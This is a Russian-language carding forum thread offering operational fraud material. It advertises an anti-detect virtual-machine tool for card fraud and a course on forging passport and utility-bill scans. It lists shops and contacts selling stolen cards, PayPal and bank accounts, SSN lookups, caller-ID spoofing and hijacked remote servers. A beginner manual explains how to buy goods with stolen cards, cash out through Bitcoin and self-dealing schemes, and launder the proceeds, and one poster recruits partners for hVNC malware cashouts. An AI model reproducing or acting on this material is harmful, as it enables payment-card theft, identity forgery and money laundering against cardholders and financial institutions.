2 - Настраиваем безопасность Windows (инструкция закрытия основных дыр и портов).
3 - Учимся работать с виртуальной клавиатурой.
4 - Настройка браузера: закрываем дыры и отключаем слежку.
5 - Учимся правильно заметать следы (удалять данные с компьютера).
6 - Программы для "железного" удаления данных. Как их верно использовать.
7 - Создаем электронную почту, которую не возможно взломать.
8 - Шифруем данные на жестком диске.
9 - Используем анонимайзер.
10 - Устанавливаем и настраиваем VPN.
11 - Разбираемся где покупать и как использовать СОКСЫ.
12 - Учимся использовать Dedicated servers (дедики)
13 - Скрываем свои DNS сервера.
14 - Учимся работать с зашифрованной самоуничтожающейся флешкой.
15 - Учимся работать с браузером TOR.
16 - Учимся использовать самоуничтожающиеся зашифрованные заметки.
17 - Создаем и используем одноразовый e-mail.
18 - Регистрируем рабочий jabber на безопасном сервере.
19 - Настраиваем OTR шифрование переписки в jabber
20 - Настраиваем GPG шифрование переписки в jabber
21 - Учимся передавать свой ключ и общаться по зашифрованному каналу в jabber


Virtual Hacker's Pc 3 - лучший софт для создания своего
быстрого дохода в сети интернет.
Для использования CC, Paypal, промо - купонов Adwords, а также для бонусхантеров, спамеров по
email, социальным сетям, SEOшников
Уникальный метод работы с OS, при котором магазины, покеррумы ,мерчанты, банки всегда
пропускают Ваши платежи.
Смена серийных номер OS и Вашей копии Virtual Hacker's Pc 3 за 30 секунд.
Подключает все Ваши программы к любым видам прокси (Tor,VPN,SSH,RDP(дедики)), в том числе к
цепочкам соксов со скоростями 1 - 10 мбит и живущих месяцами.
Для приложений, чувствительных к наличию виртуальной машины есть сборка с антидетект патчем
Улучшенная работа со снимками состояний жестких дисков виртуальных машин и откатом.
Для пользователей дедиков(выделенных серверов)
Возможность выхода на выделенные сервера через двойное шифрование.
Автоматическая анонимная проверка баз дедиков и сортировка их по регионам.
Фильтрация по регионам - с точностью до почтового индекса (по базе Paypal).
Накрутка партнерских программ.
Подмена любой версии браузера и OS.
Автоматизация действий по вбиву.
Фильтрация JS скриптов, которые раскрывают факт накрутки.
Складчикам.
Защищает Вас от перехвата паролей и слежения извне.
Все ваши платежные и банковские максимально защищены на зашифрованной виртуальной машине от вирусов.
VHPC3 полностью портативна, может запускаться с флешки, без следов на жестких дисках и в реёстре.
Программа для захвата звука и видео из любых программ, в том числе из Skypе.
Возможность ставить на виртуальную машину инфопродукт или программу и рассылать её всем участникам складчины. Обходит Инфопротектор.


Создаем с нуля сканы документов профессионального уровня [СНГ]
По роду своей деятельности в последние 8 месяцев(я о бонусхантинге), была и есть острая потребность в качественных документах. Вначале приходилось платить до 30$ за посредственный комплект документов и в тоже время получать:
- Дополнительные риски не пройти проверку аккаунта с кровными деньгами из-за халатности селлеров, которые любят продавать в несколько рук одни документы;
- Быть в ожидании наличия документов;
- Искать новых селлеров и вести с ними нудные переписки(хороших продавцов документов в открытом доступе мало, а которые есть – берут много денег). И тогда я решил отказаться от этого фактора риска в сторону самостоятельной подготовке документов. За эти 8 месяцев накопилось много материала, которым я и хочу поделиться. А конкретно:
- 5 заготовок украинских паспортов* + платежки за коммунальные услуги **
- 5 заготовок российских паспортов + платежки за коммунальные услуги.
- 5 заготовок казахстанских паспортов + платежки за коммунальные услуги.
* Под заготовками имеётся ввиду готовый файл в PSD(Photoshop) формате, почищенный от данных с возможностью изменить ФИО, дату рождения, место проживания, серийный номер, подпись, фотографию на произвольные данные.
** Платежки коммунальных услуг - готовый файл-шаблон в формате.cdr (CorelDRAW). С возможностью изменения всех данных, которые мы потом переносим на заготовку с эмулятором сканированной бумаги и получаем полноценный скан документа, как будто ты его получил в ЖЕК, отсканировал и отправил на проверку.
Давайте поговорим, где это может пригодиться:
- Бонусхантинг. Привет Игорю Осипову и благодарю за его продукт. Сильно вырос после изучения и внедрения. Теперь не представляю как жил ранеё на менеё чем 150 т.р. при этом имея достаточно свободного времени и возможность путешествовать по живописным местам (доход: до 200.000т.р. (по собственному опыту на данный момент).
- Стать тем самым «хорошим селлером», который берет много денег, НО уже выполняет свои обязанности на 100% и имеёт беспрекословную репутацию. Доход: до ~150.000 т.р. (основано на ценообразовании этого рынка и спроса).
- Черные темы, где наличие качественных документов – залог заоблачных сумм(доход: от 150.000 т.р. до «очень много нулей»)
- Мультиаккаунтинг в партнерских программах, платежных системах, букмекерских конторах(сильно актуально для вилочников).
Ты можешь продолжать зависеть от сомнительных продавцов, порой не адекватных в общении, платить большие деньги и быть не уверенным что твой аккаунт будет верифицирован, а можешь решить проблемы раз и навсегда и возможно даже, открыть для себя новые источники дохода. А что выбираешь ты?)
Вначале этот курс задумывался как набор рабочих заготовок по странам СНГ, в котором содержались по несколько заготовок для 3-х стран с приложенными к ним заготовками квитанций. А так же описание того как эти документы использовались и рекомендации по их дальнейшему использованию.
Но после того как началась работа над курсом были внесены фундаментальные изменения, которые полностью изменили мое виденье в этом вопросе. В курс добавлены мануалы с исчерпывающими фундаментальными знаниями, о том, как создать все заготовки самому и быть на 100% уникальным в глазах служб безопасности.

Теперь вы можете создать свою собственную базу заготовок для уникализации, научиться создавать любые типы максимально качественных документов и квитанций, а так же наладить и автоматизировать работу по их созданию. Кроме того, в курсе будут дополнительные и очень приятные бонусы, которые станут качественным дополнением и заранеё снимут те ограничения, которые ждут впереди каждого человека, занимающегося множественными регистрациями.
Вот болеё подробный план курса:
1. Редактирование заготовки Российского паспорта (+ 5 заготовок) - видео
2. Редактирование квитанции РФ (+1 заготовка + 5 заготовок бумаги для "сканера") - видео
3. Дополнительные данные для РФ (реквизиты, сервисы, ссылки) - текст
4. Редактирование заготовки Украинского паспорта (+ 5 заготовок) - видео
5. Редактирование квитанции Украины (+1 заготовка + 5 заготовок бумаги для "сканера") - видео
6. Дополнительные данные для Украины (сервисы, ссылки ) - текст
7. Редактирование заготовки Казахстанского паспорта (+ 5 заготовок) - видео
8. Редактирование квитанции для Казахстана (+1 заготовка + 5 заготовок бумаги для "сканера") - видео
9. Дополнительные данные для Казакстана (сервисы, ссылки) - текст
10. Создание заготовки паспорта с нуля до результата (ua,ru,kz) - видео
11. Создание заготовки квитанции с нуля до результата (ua,ru,kz) - видео
12. Редактирование и уникализация фотографий - видео
13. Техника создания, адаптации и уникализации печатей. - видео
14. Видео по необходимым для работы основам Corel Draw (+автоматизация)
15. Видео по необходимым для работы основам Фотошоп (+автоматизация)
16. Набор из 300 росписей в PNG формате
И САМОЕ ИНТЕРЕСНОЕ!) – Даю возможность протестировать продукт до его приобретения. Ты можешь получить российский паспорт с видео-мануалом совершенно бесплатно, чтобы оценить качество материала. Для этого вписываешься в складчину, ставишь подпись со складчиной, пишешь в ЛС, и я тебе даю индивидуальную копию (пользователи со статусом "Складчик" вместо подписи делятся ссылкой на тему в других тематических складчинах). Ты ничего не теряете, а лишь приобретаете заготовку стоимостью болеё 100$ бесплатно. Если что то не понравится или дорого или еще что то… -
Выписываешься и мы расходимся без обид (не откажусь если оставишь подпись.
Меня самого достали эти некачественные продукты-недоделки и мне бы понравилась такая возможность в других складчинах. Но актуально для первых 100 написавших в ЛС, так что спеши!
Честно говоря – завидую тебе, что ты можете получить такую сборку, которая дает почти не ограниченные возможности… Да еще и с возможностью теста. Материал создавалась на протяжении болеё полу года вдвоем с напарником, оттестирован на своих ошибках рискуя реальными деньгами!
Напарник будет плотно вести поддержку 2 недели после выдачи материала и отвечать тут в теме.
Далее уже будем помогать в критических ситуациях.
Скачать: https://yadi.sk/d/OsN3NAalbTpoF

Курс по локальной/сетевой/финансовой анонимности и безопасности - боевая машина Linux
https://www.dropbox.com/sh/kdss9fbu1mp95i2/X8n7WIe8-U

Полезные контакты (cc/отрисовка/пробив/прозвон и.т.д.)

Шопы с материалом:
goldcvv.cc - шоп с закрытой регистрацией (регистрируют в [email protected]). Картона много, но последнеё время очень плохой процент валидных карт.
cvv.me - открытый шоп, очень часто обновляется. Валид на уровне.
Саппорт [email protected] - (С ШОПОМ НЕПОНЯТКИ САПП В МОРОЗЕ)
Octavian.su - открытый шоп, качественные базы и удобный быстрый движок. Единственный минус - очень редкие обновления, большую часть времени шоп стоит без материала.
sruka.cc
logoshopcc.org
approved1.su
uniccshop.ru
feshop-card.ru
[email protected] - селлер картона с VBV (высокий валид, цены 100-250$ за СС)
slilpp.org - продажа аккаунтов PAYPAL
[email protected] - Банк. аккаунты
ccbases.com - шоп сс (пополнение от 30$) + чекер на привязку сс к палке 0.3$
[email protected] - продает не дорогой чекер сс на валид 10$
Acc PP+eBay - ЮК акки PayPal eBay связки., англоязычный селлер
[email protected] & [email protected] - CC разных стран.
[email protected] - Селлер сс, выборка только по бинам
http://ppccfdsrm7rf6gxf.onion/ - TOR шоп PP и CC
663411627 - селлер СС+ВБВ usa 30$ other 100$
311750 - Селлер EU CC
[email protected] - Селлер usa|eu CC
validcc.su - шоп СС с хорошими отзывами на чек дают 10 мин.
zeon.pw - шоп СС пополнение битками на чек 10 мин.

Сканы, документы, отрисовка:
[email protected] - отрисовка USA паспортов, CC.
ICQ 651368360 - отрисовка сканов
http://zapili.cc/ - Автоматический сервис по отрисовке сканов ([email protected])
[email protected] - продажа комплектов сканов РУ и СНГ
icq 668287575 - комплекты сканов ру и СНГ
[email protected], icq 939719 - отрисовка сканов + фото сканов + фото с доками в руках (довольно дорого)
[email protected] & ICQ 553629962 - отрисовка документов многих стран (сс 10, pass 15, стейтмент 10)
icq: 652168882 - Цена рисовки карты 10у.е. Паспорт 20у.е
http://banality.biz - отрисовка
[email protected] - СВОЙ сервис ID, CC, docs scan&photoscan !!!Осторожно человек пропал затянув заказы!!!

Пробив | Продажа DOB/SSN
[email protected]
ICQ : 897187
ssnfinder.ru - автоматический сервис (быстро и дешево = 3 wmz)
ICQ: 604-743-629, [email protected] - 4 wmz пробив
[email protected] - Пробив/продажа Стоимость 3$
traff[email protected] - Продажа по 1$
[email protected] - Продажа по 1$

Прозвон:
[email protected] - 8 wmz звонок с подменой номера. Также приём звонков и аренда номеров под штат.
[email protected] - 9 wmz любой звонок
[email protected] - 10 wmz за звонок +2 wmz за подмену номера
[email protected] & [email protected] (OTR only) - прозвон по абонементам от 10$

Спуффинг (подмена Caller ID - звонящего)
Автоматизированный SIP-сервис звонков с подменой номера (НЕ ПРОЗВОН)

Jabber: [email protected] либо [email protected]
Spoiler: Подробное описание. Сервис осуществляет звонки по протоколу SIP через интернет. Существует множество клиентов под различные платформы и архитектуры.
- Используем g729, gsm, ulaw, alaw кодеки. Gsm кодек позволят звонить с очень низкой скоростью
пропускного канала в инетернет.
- Возможность пополнения
- Удобный интерфейс для выбора номера спуфинга
- Наличие SIP клиентов с открытыми исходниками практически под любую платформу (Windows,
Linux, Mac, Android, iPhone)
- Возможность создания подаккаунтов, для выдачи своим работникам или прозвонщикам
- Отсутсвие логов и полная анонимность сервиса
- Все необходимое стоит на сервере на крипторазделе, который отключается при
несанкционированом доступе
- Свободная регистрация
Ещё один сервис sipfake.ru

Продавцы дедиков:
Icq 421383
Icq 679742
[email protected] & 489452 - RDP
superded.org - онлайн шоп с дедами (удобно)
dedicatesales.com - юса по 1,5$

Информация по BIN:
http://binbase.com/search.html
http://bins.pro/
http://bindb.com

Сокс | SSH-Сервисы:
http://5socks.net
http://vip72.com
http://ipsocks.pro
http://anyproxy.net

VPN Сервисы:
http://in-disguise.com - VPN сервис, удобный gui

Обменные пункты электронной валюты:
pm2pmr.me - PAYMER чеки
wm2btc.biz - WM > BTC
http://mmgp.ru - PAYMER чеки
ICQ 168-297-666 - обмен WMZ на BTC
pm2btc.me - BTC
icq: 366331, support@finance.biz.pl, jid@finance.biz.pl - WM, PM, BTC-E code, Bitcoin, PP, WIRE, Приват24,
Alfa, Втб, Связной, Сбер, Qiwi, UAPS - в любых направлениях
DigitalExchange.ru, icq: 357805178, [email protected] - мультивалютный
highflyexchange.com - WMZ > BTC
https://forum.btcsec.com/index.php?/topic/1662-premiia-3-btc-e-code-rub/ - пополняла BTC
web-mig.ru - PAYMER коды
indacoin.com - биржа биткоинов, можно вводить деньги с wm и киви, пополнение мгновенное.
braveb6xgkctts5l.onion - анонимный онлайновый биткоин кошелек в сети tor
[email protected] - обмен wmz на Paymer
matbea.com - обменник qiwi-btc комиссия 1%, отличный супорт прямо на сайте, деньги зачисляются моментально, также моментально переводятся в бтк.
localbitcoins.com - хорошая площадка по обмену битков. есть трейдеры принимающие вм, киви, банки. Почти всегда кто то из трейдеров онлайн

Сервисы по онлайн отправке факсов:
faxzero.com
faxinating.com
gotfreefax.com
onlinefaxservice.com
efax.com

Посредники:
http://shophelp.ru/forum/forumdisplay.php?f=41

Селлеры дебеток/wm/qiwi/vcc:
[email protected] - Продажа формалок WebMoney. 300 р за штуку. В комплекте высылает сканы доков (паспорт, снилс и инн).
VCC - VCC для верифа PP, eBay, Amazon
 
Last edited by a moderator:

Carder

Professional
Messages
2,619
Reputation
7
Reaction score
1,641
Points
113
Спасибо за кардинг методичку, очень дельный пост и обязательно пригодиться новичкам.

Ну что, давно что-то не писал на форуме. Чёт так все не до этого, я настолько разжирел за эти полгода что некогда вбить себе джентельменские котлы, ситуация двоякая, всегда старался шмот за оверпрайс или технику брать за бугром у нашего с вами американского биг брата. Кто бы что не говорил, что жить и носить пизженое аморально, но давайте себе будем отдавать фул отчёт, Окей, все здесь, или большинство переступали порог морали в любом ее виде. Я ношу шмот или юзаю дорогую бытовую технику и кайфую от осознания того что: 1-е это стоит дохера, 2-е я эта сам сделал, я молодец!
Неважно сколько стоят часы 2-4-10к$, мне все равно! Белыми деньгами, платить за бренд-шмот, такое... хз, есть во мне что-то еврейское что ли или осознанное понимание устройств вещей в мире включая устройство образования цен политики на оверпайсовые вещи, адекватный взгляд на цену иными словами...

Ещё такая тема, заметил, что котлы за 4-6к$ нихера не пизже чем апл ватчи за 500$. Какие-нибудь брендовые часы швейцарского производителя стоят каких-то заоблачных денег, в то время, когда микро-плата от технологичного гиганта меряет уровень кислорода КАРЛ у тебя в крови.
Офигенная тема, когда тебе приходит пуш и тебе впадлу идти в другой конец школьного коридора чтоб чекнуть что там на мобиле пришло, ты тупо сгибаешь свою ветку под углом 90’ и смотришь что очередной инфоцыган толкает кардинг обучение на своём канале за 300$~. Удобно пацаны отвечаю, берите себе ватчи б/у за 5-6к₽, вы значительно и существенно упростите свою жизнь такими, казалось бы, не значительными вещами.

Хотел ещё поведать вам, что у меня все хорошо. Я наконец приблизился ещё на один маленький шажок к своему успеху/цели. Все дело вот в чем, когда я был юн и глуп, свои первые миллионы я слил в офлайн биз, поняв какие Реалии суровые-столкнувшись с бизнесом Аля в стиле 90х-через два года я понял, что это не мое, ну точно не в рф такой темой страдать (налоги, бухгалтерия, отчеты-это тот еще геморрой, нельзя назвать это бизнесом, и уж тем более не предпринимательством точно). Видел страны где открыть «ООО» стоит вопрос 2-х минут, а обслуживать бизнес, может даже твоя собака, все понятно и интуитивно и нет сложностей с бухгалтерией. Но, есть жирный минус у таких стран, это бакс. Я зарабатываю бакс и мне приятно, когда рубль растет-параллельно раздабывая за собой экономику рф. Если я буду жить в еу, то: заработал я так же, а вот купить уже все, соотношение бакса к баксу адекватное если ты работаешь на белой работе и имеешь стабильный доход. Мы же зарабатываем в штатах\еу и тратимся в рф.
Нет, я не слился перед трудностями, наоборот, я такой тип что люблю, когда сложное перерастает в интересное, а потом даёт ещё свой Вайт-профит. Поэтому принял решение развиваться профессионально в онлайне, вот ещё бложик свой замутил модный.
Новый опыт – хорошо забытый старый
Я тут заморочился и угорел, в итоге есть результаты в виде hvnc ботов и слаженной работы целой команды спецов. На этот счёт ещё думаю будет серия статей, но пока мне тупо некогда, очень много сложных мелких технических нюансов, требующих внимание.
У кого есть опыт работы с hvnc в обнале серьезных сумм или другие какие темы серьезные, предлагаю вместе заработать $$$
Этот проект запускался 4 месяца прежде чем дать предварительный результат, было слито порядка Х000$ и сугубо потрачено выше Х0000$ и жизнь проекта по малвари задумывалась больше как идея на перспективу, пока росли и развивались, появились некие другие идеи как можно сделать и во что перерасти. Короче мне страшно представить, что будет на выходе, одно знаю точно, то что я проделал такой длинный путь осваивая новый профиль деятельности - послужит отличным бекграундом/опытом для зарабатывания новых денег (Х 000 000+)

Вторая новость, которая меня простимулировала запилить пасту на форуме, это то что нас уже 100000!
Всех обнял и поздравляю!

Для кардеров-новичков есть подгон, ловите халявyю, простую и лёгкую кардинг тему carder.market/showthread.php?t=91273
 

Carding 4 Carders

Professional
Messages
2,731
Reputation
12
Reaction score
1,305
Points
113

Очень большая методичка для новичков + Схемы и вопрос/ответ.​

Основные заблуждения.

1. Хочу все и сразу.


Первая ошибка в том, что новичок хочет сразу заниматься заливами, купить себе СС и перегонять на свою карту, такого не бывает. С СС перевести деньги на другую СС технически невозможно, можно только списать средства с СС. Я всегда советую начинать с вещевухи, как искать шопы, вбивать и принимать стафф, здесь все есть. Также статейка по общим понятиям по заливам есть.

2. Безопасность. Меня посадят.

Одна из главных проблем новичка - это боязнь, что его посадят. Почему-то думает, что он сразу начнет зарабатывать миллионы и за ним непременно следят. Если ты скардишь даже пускай сотню товаров из шопа, то шанс, что за тобой придут, равен или почти равен нулю! И это самое главное, что нужно себе вбить. Когда ты вбиваешь в шоп с дедика, ты уже скрываешь свой реальный ip, причем используешь не сокс, а именно дедик, который имеет наибольшую анонимность.

Да, когда в месяц доходы будут больше 2,000$, то следует купить себе ВПН, ВПН - это те же дедики, но только соединенные один маршрутом, связка ip, т.е. реальное местоположение будет не реально вычислить, если, например, сервера для ВПНа находятся в Панаме или Шри-ланке, потому что власти этих стран по дефолту не будут раскрывать логи Интерполу.

3. Легкие деньги.

Возможно, ты уже знаешь, что все продавцы дампа+пина это все лохотрон. А если нет, то предупреждаю деньги за деньги никто не продает, чудеса возможны только в стране дураков.

Предисловие. Куда можно вбить и как на этом заработать.

1. Шопы. Плюсы: относительно легко найти шлющий шоп. Минусы: шопы быстро помирают, маленький % чистого дохода от вбива. Как искать шопы и как анонимно принимать стафф есть в материалах.

2. Свой мерчант счет. Плюсы: доход от вбива до 95%. Минусы: стартовый капитал на поднятие своего мерчанта, сложность найти мерчант с большим процентом допустимых чарджбеков или с мгновенным выводом. Как открыть свой мерчант счет есть в материалах.

3. Брокерские конторы, типа форекс и биржи. Вбивать СС смысла нет, но можно купить с логов такие аккаунты и открыть счет на дропа с таким, же именем и фамилией, как у холдера и слить все деньги на дропа.

4. Покер аккаунты и конторы со ставками на спорт. Можно конечно заниматься чипдампингом и придумывать свои цепочки, а можно пойти проще через небольшой обман. Тема по выводу есть в материалах.

5. Мобильные операторы. Скажу сразу, что в СНГ операторов вбить не получится, не спорю такие мерчи есть, но лимиты на пополнения колеблются около 10$, это просто того не стоит, чтобы тратить свое время.

6. Онлайн игры. На данный момент, вбив в СНГ игры умер напрочь, зарабатывать на этом не получится, деньги могут списаться с СС, но на счет игры не поступят, если придут, то быстро локнут аккаунт. Так, что вбиваем только в пиндосовские игры или покупаем золото у поставщиков. Вбивается лучше с пайпел, нежели с СС. Если один будет вбивать, а другой выводить, то можно хорошо сработаться.

7. Платежные системы. Не стоит вбивать в пайпел, хотя бы, потому что цены на аккаунты доступны, также нет смысла вбивать в манибукерсы (скрил) эта платежка больше себя позиционирует для оплаты товаров и услуг, нежели для расчетов. А вот вбивать в алертпей смысл есть, достаточно принять смс, отправить 2 скана и можно вбивать.

8. Остальное. Это всевозможные лохотроны, ммм, соцсети, хостинг, реклама, порно и т.д. 1 правило вбить в СНГ сайты не получится, за исключением, если не прикручен пайпел, алертпей и им подобные.

Поздравляю тебя, ты сделал верный шаг на встречу к большим деньгам. Можно было полгода и более потратить на самообучение, ни один раз обжечься и начать зарабатывать деньги или вовсе разочароваться и бросить это дело. А можно прочесть эту статью до конца, осознать все и не просто хорошо зарабатывать, а начать косить бабло.

Когда человек далекий от кардинга, слышит слово «кардинг», ему в голову начинают приходить образы заливов, как он снимает деньги с буржуйских карточек и перегоняет на свои счета. Такого не бывает. Нельзя просто взять с одно СС на другую СС слить бабло. Можно с роллки (СС с онлайн банкингом) перевести деньги на СС (карту) дропа одной и той же страны. Цены на карты начинаются от 400$ и заканчиваются 5000$, а залить на них миллионы не получится, т.к. все упирается в лимиты.

Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.

Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккаунтами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.

Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стафф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стафф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стаффер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ - усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.

Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги.

Но в итоге все сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $?»

Способ № 0 - продажа

Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даешь кредитную карточку - тебе тут же перечисляют практические легальные деньги.

Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты впоследствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.

Способ №1 – перевод

Давай посмотрим, как осуществить перевод денег «СС > Bitcoin > WM» (кредитная карта – «Bitcoin» - WebMoney). Дело в том, что Bitcoin деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти, например, на https://www.bestchange.ru), главное - выбрать подходящие тебе проценты. Конечно, здесь есть и сложности - у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.

Происходит все так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на Bitcoin. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно - открываешь свой bitcoin и удивляешься лежащей там сумме. Но не все так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спер его честно заработанные деньги. Так что очень важно успеть еще эти деньги отмыть. Есть люди, которые этим занимаются – ты шлешь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.

Ты можешь возразить: мол, можно найти обменник BITCOIN > WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег нальщику (так зовут этого самого посредника). Но имей в виду, что вскоре этот обменник – после того, как Bitcoin заберет у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера - “Хочешь жить, умей вертеться”.

Способ № 2 – отмыв через аукцион

Идем на любой интернет-аукцион

и выкладываем там лот: "Домен + хостинг за XX $ в год! Оплата по WM". Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг и продавать за XX $ покупателям с аукциона.

Казалось бы, все просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да все потому же - кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?

Способ №3 – партнерские программы

Для того чтобы осуществить этот способ, нам придется найти партнерские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И - ждем свои WM.

Тут, думаю, все шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнерских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счетчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка. Этому способу посвящена целая статья этого номера, поэтому я не буду останавливаться на нем подробно.

Способ №4 – Задай себе вопрос за деньги

Наш путь лежит на любую биржу фриланса, в раздел «эксперт». Для реализации этого способа надо взять кучу карт без кода, создать аккаунты на этом сайте и задавать себе (как эксперту) вопросы из разных категорий. Каждый вопрос стоит определенную сумму (ее ты требуешь сам). За 2-3 вопроса в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придется попросить выслать чек, а при обнале - попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.

Способ №5 – Поторгуйся сам с собой

Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платежную систему.

Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем все у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберется достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же - мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное - не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во все те же WM.

Способ №6 – рекламируй свои услуги

Достаточно простой, на мой взгляд, способ. Для его осуществления тебе нужно каким-то образом разрекламировать услугу: "Делаю хостинг с доменным именем для сайтов for life за n webmoney". А потом, после каждого заказа, заполнять маленькую форму и вписывать туда свои креды. На hostonce практически не проверяют cc, и сайт никогда не закроют. А на следующий день тебе останется получить свои “честно” заработанные webmoney. Разумеется, за отлично исполненный заказ.

Способ №7 – Задорно, но не порно?

Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин.

Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остается только прикинуться порноманьяком - вбить карты на своем шопе. Потом, уже в роли порнопродавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).

У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус - обычно дают не больше 25% с продажи.

Заключение

Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет - это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется, наши статьи :).

Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3.

WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.

Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.

На hostonce практически не проверяют cc, и сайт никогда не закроют.


Вбив.

Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.

Что нужно для успешного вбива?

- Материал. СС и Дедик, дедик берем сразу под штат СС.

- Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.

По шагам.

